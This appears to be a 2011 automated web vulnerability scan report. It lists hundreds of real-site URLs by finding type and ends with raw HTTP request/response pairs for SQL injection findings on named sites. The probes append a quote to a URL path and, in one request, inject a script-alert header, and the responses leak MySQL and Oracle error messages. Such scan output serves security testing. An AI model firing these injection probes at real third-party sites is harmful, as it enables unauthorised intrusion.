11.5. http://dogpile.com/dogpile/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11
11.6. http://googleads.g.doubleclick.net/pagead/ads
11.7. http://googleads.g.doubleclick.net/pagead/ads
11.8. http://googleads.g.doubleclick.net/pagead/ads
11.9. http://googleads.g.doubleclick.net/pagead/ads
11.10. http://googleads.g.doubleclick.net/pagead/ads
11.12. http://investor.infospaceinc.com/phoenix.zhtml
11.13. http://manhattan.ny1.com/Content/ServeContent.aspx
11.14. http://manhattan.ny1.com/Content/ServeContent.aspx
11.15. http://manhattan.ny1.com/Content/ServeContent.aspx
11.16. http://manhattan.ny1.com/Content/ServeContent.aspx
11.17. http://manhattan.ny1.com/Content/ServeContent.aspx
11.18. http://manhattan.ny1.com/Content/ServeContent.aspx
11.19. http://manhattan.ny1.com/Content/ServeContent.aspx
11.20. http://manhattan.ny1.com/Content/ServeContent.aspx
11.21. http://www.beatthetraffic.com/widgets/traveltimes.aspx
11.22. http://www.cambridge.org/uk/404_error.asp
11.23. http://www.dogpile.com/clickserver/_iceUrlFlag=1
11.24. http://www.dogpile.com/clickserver/_iceUrlFlag=1
11.25. http://www.dogpile.com/clickserver/_iceUrlFlag=1
11.26. http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11
11.27. http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11
11.28. http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11
11.29. http://www.dogpile.com/dogpile_other/ws/about/_iceUrlFlag=11
11.30. http://www.dogpile.com/dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11
11.31. http://www.dogpile.com/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11
11.32. http://www.dogpile.com/dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11
11.33. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11
11.34. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11
11.35. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11
11.36. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11
11.37. http://www.dogpile.com/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11
11.38. http://www.dogpile.com/dogpile_other/ws/categories/_iceUrlFlag=11
11.39. http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11
11.40. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11
11.41. http://www.dogpile.com/dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11
11.42. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11
11.43. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11
11.44. http://www.dogpile.com/dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11
11.45. http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11
11.46. http://www.dogpile.com/dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11
11.47. http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11
11.48. http://www.dogpile.com/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11
11.49. http://www.dogpile.com/dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11
11.51. http://www.dogpile.com/dogpile_other/ws/preferences/_iceUrlFlag=11
11.53. http://www.dogpile.com/dogpile_other/ws/privacy/_iceUrlFlag=11
11.55. http://www.dogpile.com/dogpile_other/ws/tips/_iceUrlFlag=11
11.56. http://www.dogpile.com/dogpile_rss/ws/about/_iceUrlFlag=11
11.57. http://www.dogpile.com/dogpile_rss/ws/faq/_iceUrlFlag=11
11.58. http://www.dogpile.com/dogpile_rss/ws/index/
11.59. http://www.dogpile.com/dogpile_rss/ws/index/_iceUrlFlag=11
11.60. http://www.dogpile.com/dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11
11.61. http://www.dogpile.com/dogpile_rss/ws/index/qcat=yp/_iceUrlFlag=11
11.62. http://www.dogpile.com/dogpile_rss/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11
11.63. http://www.ny1.com/Content/ServeContent.aspx
11.64. http://www.ny1.com/Content/ServeContent.aspx
11.65. http://www.ny1.com/Content/ServeContent.aspx
11.66. http://www.ny1.com/Content/ServeContent.aspx
11.67. http://www.ny1.com/Content/ServeContent.aspx
11.68. http://www.ny1.com/Content/ServeContent.aspx
11.69. http://www.ny1.com/Content/ServeContent.aspx
11.70. http://www.ny1.com/Content/ServeContent.aspx
11.71. http://www.ny1.com/favicon.ico
11.72. http://www.quickyellow.com/includes/all.topcategories.cfm
12. Cross-domain script include
12.1. http://ad.amgdgt.com/ads/
12.2. http://cim.meebo.com/cim/init.php
12.4. http://dogpile.com/dogpile/ws/index/qcat=yp/_iceUrlFlag=11
12.5. http://dogpile.com/dogpile/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11
12.6. http://ecards.myfuncards.com/myfuncards/404
12.7. http://googleads.g.doubleclick.net/pagead/ads
12.8. http://googleads.g.doubleclick.net/pagead/ads
12.9. http://investor.infospaceinc.com/phoenix.zhtml
12.10. http://manhattan.ny1.com/App_Skins/News1/Scripts/functions.js
12.11. http://manhattan.ny1.com/Content/ServeContent.aspx
12.22. http://s.aeriagames.com/misc/ads/error_banner_en.html
12.23. http://www.2theadvocate.com/favicon.ico
12.25. http://www.beatthetraffic.com/widgets/traveltimes.aspx
12.26. http://www.cambridge.org/uk/catalogue/viewBasket.asp
12.27. http://www.carolwrightgifts.com/favicon.ico
12.28. http://www.clairol.com/favicon.ico
12.29. http://www.courtcareers.com/favicon.ico
12.30. http://www.covergirl.com/favicon.ico
12.31. http://www.crosswalk.com/favicon.ico
12.32. http://www.dogpile.com/
12.33. http://www.dogpile.com/dogpile/ws/about/
12.34. http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11
12.35. http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11
12.36. http://www.dogpile.com/dogpile/ws/faq/
12.37. http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11
12.39. http://www.dogpile.com/dogpile_other/ws/about/_iceUrlFlag=11
12.40. http://www.dogpile.com/dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11
12.41. http://www.dogpile.com/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11
12.42. http://www.dogpile.com/dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11
12.43. http://www.dogpile.com/dogpile_other/ws/bookmark/bwr=ffchrm/_iceUrlFlag=11
12.44. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11
12.45. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11
12.46. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11
12.47. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11
12.48. http://www.dogpile.com/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11
12.49. http://www.dogpile.com/dogpile_other/ws/categories/_iceUrlFlag=11
12.50. http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11
12.51. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11
12.52. http://www.dogpile.com/dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11
12.53. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11
12.54. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11
12.55. http://www.dogpile.com/dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11
12.56. http://www.dogpile.com/dogpile_other/ws/index
12.57. http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11
12.58. http://www.dogpile.com/dogpile_other/ws/index/qcat=Images/_iceUrlFlag=11
12.59. http://www.dogpile.com/dogpile_other/ws/index/qcat=News/_iceUrlFlag=11
12.60. http://www.dogpile.com/dogpile_other/ws/index/qcat=Video/_iceUrlFlag=11
12.61. http://www.dogpile.com/dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11
12.62. http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11
12.63. http://www.dogpile.com/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11
12.64. http://www.dogpile.com/dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11
12.66. http://www.dogpile.com/dogpile_other/ws/preferences/_iceUrlFlag=11
12.68. http://www.dogpile.com/dogpile_other/ws/privacy/_iceUrlFlag=11
12.70. http://www.dogpile.com/dogpile_other/ws/termsofuse/_iceUrlFlag=11
12.71. http://www.dogpile.com/dogpile_other/ws/tips/_iceUrlFlag=11
12.72. http://www.dogpile.com/dogpile_rss/web/GE+Zero+Taxes
12.73. http://www.dogpile.com/dogpile_rss/web/Go+Daddy+CEO+Elephant
12.74. http://www.dogpile.com/dogpile_rss/web/MLB+Schedule
12.75. http://www.dogpile.com/dogpile_rss/ws/about/_iceUrlFlag=11
12.76. http://www.dogpile.com/dogpile_rss/ws/aboutresults/_iceUrlFlag=11
12.77. http://www.dogpile.com/dogpile_rss/ws/faq/_iceUrlFlag=11
12.79. http://www.dogpile.com/dogpile_rss/ws/index/
12.80. http://www.dogpile.com/dogpile_rss/ws/index/_iceUrlFlag=11
12.81. http://www.dogpile.com/dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11
12.82. http://www.dogpile.com/dogpile_rss/ws/index/qcat=yp/_iceUrlFlag=11
12.83. http://www.dogpile.com/dogpile_rss/ws/preferences/_iceUrlFlag=11
12.84. http://www.dogpile.com/dogpile_rss/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11
12.85. http://www.dogpile.com/dogpile_rss/ws/privacy/_iceUrlFlag=11
12.86. http://www.dogpile.com/dogpile_rss/ws/termsofuse/_iceUrlFlag=11
12.87. http://www.hy-vee.com/favicon.ico
12.88. http://www.jillianmichaels.com/favicon.ico
12.89. http://www.mercantila.com/
12.90. http://www.nolo.com/favicon.ico
12.91. http://www.ny1.com/App_Skins/News1/Scripts/functions.js
12.92. http://www.ny1.com/Content/ServeContent.aspx
12.93. http://www.pg.com/favicon.ico
12.94. http://www.phonedog.com/favicon.ico
12.95. http://www.qctimes.com/favicon.ico
12.96. http://www.soccer.com/favicon.ico
12.97. http://www.tonzr.com/favicon.ico
12.98. http://www.wkyt.com/favicon.ico
12.99. http://www.wndu.com/favicon.ico
12.100. http://www.wsaz.com/favicon.ico
13.1. http://investor.infospaceinc.com/phoenix.zhtml
13.2. http://s.meebocdn.net/cim/script/meebo_cim_v88_cim_9_4_6.js
13.3. http://www.163.com/favicon.ico
13.4. http://www.amatura.com/favicon.ico
13.6. http://www.atmovs.com/favicon.ico
13.7. http://www.cambridge.org/contacts/
13.8. http://www.cambridge.org/uk/404_error.asp
13.9. http://www.cambridge.org/uk/catalogue/viewBasket.asp
13.10. http://www.cappex.com/favicon.ico
13.11. http://www.car-part.com/favicon.ico
13.12. http://www.colorado.edu/favicon.ico
13.13. http://www.conceptcarz.com/favicon.ico
13.14. http://www.dailydealfetcher.com/Theme/js/jquery.cookie.js
13.15. http://www.dmvnow.com/exec/common/textsizer.js
13.16. http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11
13.17. http://www.dogpile.com/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11
13.18. http://www.family-pics.net/favicon.ico
13.19. http://www.fender.com/favicon.ico
13.20. http://www.fueleconomy.gov/favicon.ico
13.21. http://www.imapcast.com/favicon.ico
13.22. http://www.infospaceinc.com/contactus.aspx
13.23. http://www.metapress.com/favicon.ico
13.24. http://www.my-junior-sister.net/favicon.ico
13.25. http://www.mycountdown.org/favicon.ico
13.26. http://www.net-temps.com/favicon.ico
13.27. http://www.noaawatch.gov/favicon.ico
13.28. http://www.outspark.com/favicon.ico
13.29. http://www.overtons.com/favicon.ico
13.30. http://www.palomar.edu/favicon.ico
13.31. http://www.progressiveagent.com/favicon.ico
13.32. http://www.quartalflife.com/favicon.ico
13.33. http://www.quickyellow.com/scripts/v3/js/jquery.colorbox-min.js
13.34. http://www.stvid.com/favicon.ico
13.35. http://www.ucsc.edu/favicon.ico
13.36. http://www.viagra.com/common/js/lib/s_code.js
13.37. http://www.viagra.com/common/swf/js/s_code.js
13.38. http://www.wsaz.com/favicon.ico
14. Private IP addresses disclosed
14.1. http://manhattan.ny1.com/content/top_stories/
14.2. http://static.ak.connect.facebook.com/connect.php/en_US
14.3. http://www.allforgold.com/favicon.ico
14.4. http://www.consolelegends.com/favicon.ico
14.5. http://www.holidayscentral.com/favicon.ico
14.6. http://www.jobtarget.com/favicon.ico
14.7. http://www.jpcycles.com/favicon.ico
14.8. http://www.la-z-boy.com/favicon.ico
14.9. http://www.ny1.com/favicon.ico
14.10. http://www.ny1.com/favicon.ico
14.11. http://www.psasurveys.com/favicon.ico
14.12. http://www.pscufs.com/favicon.ico
14.13. http://www.queerty.com/favicon.ico
14.14. http://www.thoughtprojects.com/favicon.ico
14.15. http://www.tvseriesfinale.com/favicon.ico
15. Credit card numbers disclosed
15.1. http://a.collective-media.net/adj/ns.androidtapp/general
15.2. http://pubads.g.doubleclick.net/gampad/ads
15.3. http://s.aeriagames.com/misc/ads/error_banner_en.html
16. HTML does not specify charset
16.1. http://ad.doubleclick.net/adi/N3941.5122.NY1/B5147666.2
16.2. http://ad.doubleclick.net/pfadx/aeriagames_cim/
16.3. http://ds.addthis.com/red/psi/sites/dogpile.com/p.json
16.4. http://ds.addthis.com/red/psi/sites/www.dogpile.com/p.json
16.5. http://fls.doubleclick.net/activityi
16.6. http://uac.advertising.com/wrapper/aceUACping.htm
16.7. http://view.c3metrics.com/c3VTabstrct-6-2.php
16.8. http://view.c3metrics.com/v.js
16.9. http://www.4jobs.com/favicon.ico
16.10. http://www.800adfrenzy.com/favicon.ico
16.11. http://www.accessmycardonline.com/favicon.ico
16.12. http://www.activediner.com/favicon.ico
16.13. http://www.aeriagames.com/favicon.ico
16.14. http://www.affairsclub.com/favicon.ico
16.15. http://www.afterellen.com/favicon.ico
16.16. http://www.allthumbshost.com/favicon.ico
16.17. http://www.amazingfreerewards.com/favicon.ico
16.18. http://www.amazingrewardsonline.com/favicon.ico
16.19. http://www.americajob.com/favicon.ico
16.20. http://www.artsonia.com/favicon.ico
16.21. http://www.asset-cache.net/favicon.ico
16.22. http://www.astrocenter.com/favicon.ico
16.23. http://www.athletic.net/favicon.ico
16.24. http://www.auctionmicro.com/favicon.ico
16.25. http://www.bakati.com/favicon.ico
16.26. http://www.barelist.com/favicon.ico
16.27. http://www.betus.com/favicon.ico
16.28. http://www.biblestudytools.com/favicon.ico
16.29. http://www.big5sportinggoods.com/favicon.ico
16.30. http://www.bittybitznpieces.com/favicon.ico
16.31. http://www.bizbuysell.com/favicon.ico
16.32. http://www.blockbusterexpress.com/favicon.ico
16.33. http://www.bradsdeals.com/favicon.ico
16.34. http://www.bravoatk.com/favicon.ico
16.35. http://www.brownells.com/favicon.ico
16.36. http://www.buildacareer.net/favicon.ico
16.37. http://www.cambridge.org/date/writeYear_js.asp
16.38. http://www.cambridge.org/uk/date/writeYear_js.asp
16.39. http://www.careerplanner.com/favicon.ico
16.40. http://www.caring4cancer.com/favicon.ico
16.41. http://www.carsforsale.com/favicon.ico
16.42. http://www.cdn-businessweek.com/favicon.ico
16.43. http://www.cdn-thestreet.com/favicon.ico
16.44. http://www.centerpointenergy.com/favicon.ico
16.45. http://www.cheaperthandirt.net/favicon.ico
16.46. http://www.cheapostay.com/favicon.ico
16.47. http://www.clipartcastle.com/favicon.ico
16.48. http://www.codeplex.com/favicon.ico
16.49. http://www.covers.com/favicon.ico
16.50. http://www.custom404error.com/favicon.ico
16.51. http://www.dailytech.com/favicon.ico
16.52. http://www.demovirgins.net/favicon.ico
16.53. http://www.diapers.com/favicon.ico
16.54. http://www.dinodirect.com/favicon.ico
16.55. http://www.dltk-holidays.com/favicon.ico
16.56. http://www.ebaycoupon.us/favicon.ico
16.57. http://www.foodnetworkstore.com/favicon.ico
16.58. http://www.freebie-fusion.net/favicon.ico
16.59. http://www.frontdoor.com/favicon.ico
16.60. http://www.funnygranny.com/favicon.ico
16.61. http://www.galsarchive.com/favicon.ico
16.62. http://www.giggidy.com/favicon.ico
16.63. http://www.grammarbook.com/favicon.ico
16.64. http://www.gsnrecipes.com/favicon.ico
16.65. http://www.halloweenexpress.com/favicon.ico
16.66. http://www.hometeamsonline.com/favicon.ico
16.67. http://www.hotfile.com/favicon.ico
16.68. http://www.hqtoplist.com/favicon.ico
16.69. http://www.iforex.com/favicon.ico
16.70. http://www.iframes.us/favicon.ico
16.71. http://www.installiq.com/favicon.ico
16.72. http://www.installiqlearnmore.com/favicon.ico
16.73. http://www.insureme.com/favicon.ico
16.74. http://www.interweave.com/favicon.ico
16.75. http://www.jobappnetwork.com/favicon.ico
16.76. http://www.jobvite.com/favicon.ico
16.77. http://www.justppc.net/favicon.ico
16.78. http://www.k12jobspot.com/favicon.ico
16.79. http://www.kevinsmoneytree.org/favicon.ico
16.80. http://www.latinateens-blog.com/favicon.ico
16.81. http://www.leapfish.com/favicon.ico
16.82. http://www.lilumania.in/favicon.ico
16.83. http://www.mail2web.com/favicon.ico
16.84. http://www.maison-de-la-france.com/favicon.ico
16.85. http://www.maps.com/favicon.ico
16.86. http://www.massagegirls18.net/favicon.ico
16.87. http://www.meaning-of-names.com/favicon.ico
16.88. http://www.melaleuca.com/favicon.ico
16.89. http://www.metapress.com/favicon.ico
16.90. http://www.moneyzue.com/favicon.ico
16.91. http://www.mt.gov/favicon.ico
16.92. http://www.mydigitalpublication.com/favicon.ico
16.93. http://www.myhealthwealthandhappiness.com/favicon.ico
16.94. http://www.myhuckleberry.com/favicon.ico
16.95. http://www.newretirement.com/favicon.ico
16.96. http://www.news-medical.net/favicon.ico
16.97. http://www.newssearchonline.com/favicon.ico
16.98. http://www.nwf.org/favicon.ico
16.99. http://www.optimalfusion.com/favicon.ico
16.100. http://www.oview.com/favicon.ico
16.101. http://www.owners.com/favicon.ico
16.102. http://www.paulsnetwork.com/favicon.ico
16.103. http://www.personalizationmall.com/favicon.ico
16.104. http://www.printfree.com/favicon.ico
16.105. http://www.prize-pending.com/favicon.ico
16.106. http://www.quickyellow.com/favicon.ico
16.107. http://www.quizbar.net/favicon.ico
16.108. http://www.rcuniverse.com/favicon.ico
16.109. http://www.redrobin.com/favicon.ico
16.110. http://www.roirocket.com/favicon.ico
16.111. http://www.rubytuesday.com/favicon.ico
16.112. http://www.sanityswitch.com/favicon.ico
16.113. http://www.santanderconsumerusa.com/favicon.ico
16.114. http://www.scriptpulse.com/favicon.ico
16.115. http://www.searchzue.com/favicon.ico
16.116. http://www.seekysearch.net/favicon.ico
16.117. http://www.smartquote.com/favicon.ico
16.118. http://www.soap.com/favicon.ico
16.119. http://www.southwestvacations.com/favicon.ico
16.120. http://www.starbucksstore.com/favicon.ico
16.121. http://www.sulekha.com/favicon.ico
16.122. http://www.sun.com/favicon.ico
16.123. http://www.super-survey.com/favicon.ico
16.124. http://www.teenchat.com/favicon.ico
16.125. http://www.tennis-warehouse.com/favicon.ico
16.126. http://www.toonier.com/favicon.ico
16.127. http://www.tstickets.com/favicon.ico
16.128. http://www.tubedspots.com/favicon.ico
16.129. http://www.turbolovervidz.com/favicon.ico
16.130. http://www.ultra18.com/favicon.ico
16.131. http://www.usairwaysvacations.com/favicon.ico
16.132. http://www.venus.com/favicon.ico
16.133. http://www.w3i.com/favicon.ico
16.134. http://www.web.com/favicon.ico
16.135. http://www.williamsauction.com/favicon.ico
16.136. http://www.yellowusa.com/favicon.ico
16.137. http://www.youngcourtesans.com/favicon.ico
16.138. http://www.yourdegree.com/favicon.ico
17. HTML uses unrecognised charset
17.1. http://www.163.com/favicon.ico
17.2. http://www.soccer.com/favicon.ico
17.3. http://www.xiongdudu.com/favicon.ico
18. Content type incorrectly stated
18.1. http://ad.doubleclick.net/pfadx/aeriagames_cim/
18.2. http://event.adxpose.com/event.flow
18.3. http://view.c3metrics.com/c3VTabstrct-6-2.php
18.4. http://view.c3metrics.com/v.js
18.5. http://www.1800mobiles.com/favicon.ico
18.6. http://www.4jobs.com/favicon.ico
18.7. http://www.800adfrenzy.com/favicon.ico
18.8. http://www.activediner.com/favicon.ico
18.9. http://www.allheart.com/favicon.ico
18.10. http://www.alloy.com/favicon.ico
18.11. http://www.americajob.com/favicon.ico
18.12. http://www.artsonia.com/favicon.ico
18.13. http://www.astrocenter.com/favicon.ico
18.14. http://www.athletic.net/favicon.ico
18.15. http://www.bakati.com/favicon.ico
18.16. http://www.barelist.com/favicon.ico
18.17. http://www.bebe.com/favicon.ico
18.18. http://www.bellasugar.com/favicon.ico
18.19. http://www.betus.com/favicon.ico
18.20. http://www.biblestudytools.com/favicon.ico
18.21. http://www.biblio.com/favicon.ico
18.22. http://www.big5sportinggoods.com/favicon.ico
18.23. http://www.bizbuysell.com/favicon.ico
18.24. http://www.blockbusterexpress.com/favicon.ico
18.25. http://www.bradsdeals.com/favicon.ico
18.26. http://www.brainpop.com/favicon.ico
18.27. http://www.brownells.com/favicon.ico
18.28. http://www.buildacareer.net/favicon.ico
18.29. http://www.buzzsugar.com/favicon.ico
18.30. http://www.cambridge.org/date/writeYear_js.asp
18.31. http://www.cambridge.org/uk/date/writeYear_js.asp
18.32. http://www.careerplanner.com/favicon.ico
18.33. http://www.caring4cancer.com/favicon.ico
18.34. http://www.carsforsale.com/favicon.ico
18.35. http://www.casasugar.com/favicon.ico
18.36. http://www.cbsatlanta.com/favicon.ico
18.37. http://www.cheaperthandirt.net/favicon.ico
18.38. http://www.cheapostay.com/favicon.ico
18.39. http://www.clipartcastle.com/favicon.ico
18.40. http://www.codeplex.com/favicon.ico
18.41. http://www.covers.com/favicon.ico
18.42. http://www.craigslist.com.au/favicon.ico
18.43. http://www.craigslist.de/favicon.ico
18.44. http://www.custom404error.com/favicon.ico
18.45. http://www.dailystrength.org/favicon.ico
18.46. http://www.dailytech.com/favicon.ico
18.47. http://www.dealio.com/favicon.ico
18.48. http://www.deltadental.com/favicon.ico
18.49. http://www.diapers.com/favicon.ico
18.50. http://www.dinodirect.com/favicon.ico
18.51. http://www.directron.com/favicon.ico
18.52. http://www.dltk-holidays.com/favicon.ico
18.53. http://www.fabsugar.com/favicon.ico
18.54. http://www.findstuff.com/favicon.ico
18.55. http://www.foodnetworkstore.com/favicon.ico
18.56. http://www.frontdoor.com/favicon.ico
18.57. http://www.genealogybank.com/favicon.ico
18.58. http://www.greatdreams.com/favicon.ico
18.59. http://www.gsnrecipes.com/favicon.ico
18.60. http://www.hometeamsonline.com/favicon.ico
18.61. http://www.iforex.com/favicon.ico
18.62. http://www.inforum.com/favicon.ico
18.63. http://www.installiq.com/favicon.ico
18.64. http://www.installiqlearnmore.com/favicon.ico
18.65. http://www.insureme.com/favicon.ico
18.66. http://www.interweave.com/favicon.ico
18.67. http://www.jobappnetwork.com/favicon.ico
18.68. http://www.jobvite.com/favicon.ico
18.69. http://www.k12jobspot.com/favicon.ico
18.70. http://www.kitv.com/favicon.ico
18.71. http://www.klm.com/favicon.ico
18.72. http://www.ksat.com/favicon.ico
18.73. http://www.leapfish.com/favicon.ico
18.74. http://www.mail2web.com/favicon.ico
18.75. http://www.maps.com/favicon.ico
18.76. http://www.mattel.com/favicon.ico
18.77. http://www.meaning-of-names.com/favicon.ico
18.78. http://www.melaleuca.com/favicon.ico
18.79. http://www.mercantila-checkout.com/setcookie.js
18.80. http://www.mercantila.com/website/common/commonbroker.php
18.81. http://www.mercantila.com/website/shoppingcart/cartbroker.php
18.82. http://www.mirror.co.uk/favicon.ico
18.83. http://www.ms.gov/favicon.ico
18.84. http://www.mt.gov/favicon.ico
18.85. http://www.myhuckleberry.com/favicon.ico
18.86. http://www.mysun.co.uk/favicon.ico
18.87. http://www.nairaland.com/favicon.ico
18.88. http://www.naturallycurly.com/favicon.ico
18.89. http://www.newretirement.com/favicon.ico
18.90. http://www.news-medical.net/favicon.ico
18.91. http://www.nwf.org/favicon.ico
18.92. http://www.owners.com/favicon.ico
18.93. http://www.pennystockalley.com/favicon.ico
18.94. http://www.personalizationmall.com/favicon.ico
18.95. http://www.printfree.com/favicon.ico
18.96. http://www.puma.com/favicon.ico
18.97. http://www.rcuniverse.com/favicon.ico
18.98. http://www.redrobin.com/favicon.ico
18.99. http://www.rk.com/favicon.ico
18.100. http://www.roirocket.com/favicon.ico
18.101. http://www.rubytuesday.com/favicon.ico
18.102. http://www.sanityswitch.com/favicon.ico
18.103. http://www.shaadi.com/favicon.ico
18.104. http://www.soap.com/favicon.ico
18.105. http://www.southwestvacations.com/favicon.ico
18.106. http://www.starbucksstore.com/favicon.ico
18.107. http://www.strefa.pl/favicon.ico
18.108. http://www.sulekha.com/favicon.ico
18.109. http://www.syracuse.com/favicon.ico
18.110. http://www.tennis-warehouse.com/favicon.ico
18.111. http://www.theage.com.au/favicon.ico
18.112. http://www.tressugar.com/favicon.ico
18.113. http://www.tstickets.com/favicon.ico
18.114. http://www.venus.com/favicon.ico
18.115. http://www.w3i.com/favicon.ico
18.116. http://www.web.com/favicon.ico
18.117. http://www.williamsauction.com/favicon.ico
18.118. http://www.wlky.com/favicon.ico
18.119. http://www.worldwidelearn.com/favicon.ico
18.120. http://www.yellowusa.com/favicon.ico
18.121. http://www.yourdegree.com/favicon.ico
19. Content type is not specified
19.1. http://82.cim.meebo.com/cmd/tc
19.2. http://suggest.infospace.com/QuerySuggest/SuggestServlet
19.3. http://suggest.infospace.com/favicon.ico
19.4. http://webiq005.webiqonline.com/WebIQ/DataServer/HandlePageTag.srf
19.5. http://www.adleaf.com/favicon.ico
19.6. http://www.billoreilly.com/favicon.ico
19.7. http://www.cableone.net/favicon.ico
19.8. http://www.fender.com/favicon.ico
19.9. http://www.freelocaljob.com/favicon.ico
19.10. http://www.kraftbrands.com/favicon.ico
19.11. http://www.liasophia.com/favicon.ico
19.12. http://www.nicusa.com/favicon.ico
19.13. http://www.peopletopeople.com/favicon.ico
19.14. http://www.shtyle.fm/favicon.ico
19.15. http://www.smartauction.biz/favicon.ico
19.16. http://www.solow.com/favicon.ico
19.17. http://www.tangowire.com/favicon.ico
19.18. http://www.theupperfloor.com/favicon.ico
Severity: | High |
Confidence: | Certain |
Host: | http://politicalwire.com |
Path: | /favicon.ico |
GET /favicon.ico' HTTP/1.1 Host: politicalwire.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 01 Apr 2011 15:46:04 GMT Server: Apache/2.0.54 X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Content-Length: 2389 Content-Type: text/html <b>Error:</b> pdo error: [1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/') or (fileinfo_url like '/favicon.ico'/index%')) and te' at line 2] in EXECUT ...[SNIP]... |
GET /favicon.ico'' HTTP/1.1 Host: politicalwire.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not found Date: Fri, 01 Apr 2011 15:46:06 GMT Server: Apache/2.0.54 X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Content-Length: 22567 Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.cambridge.org |
Path: | /favicon.ico |
GET /favicon.ico' HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.cambridge.org Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/6.0 Cache-Control: private Content-Type: text/html X-Powered-By: ASP.NET Content-Length: 283 Vary: Accept-Encoding Date: Fri, 01 Apr 2011 16:20:01 GMT Connection: close Set-Cookie: ASPSESSIONIDAABDSSSR Set-Cookie: X-Mapping-kcepobcd <font face="Arial" size=2> <p>Microsoft OLE DB Provider for Oracle</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>ORA-00911: invalid character </font> <p> <fon ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.dogpile.com |
Path: | /dogpile_other/ws/index |
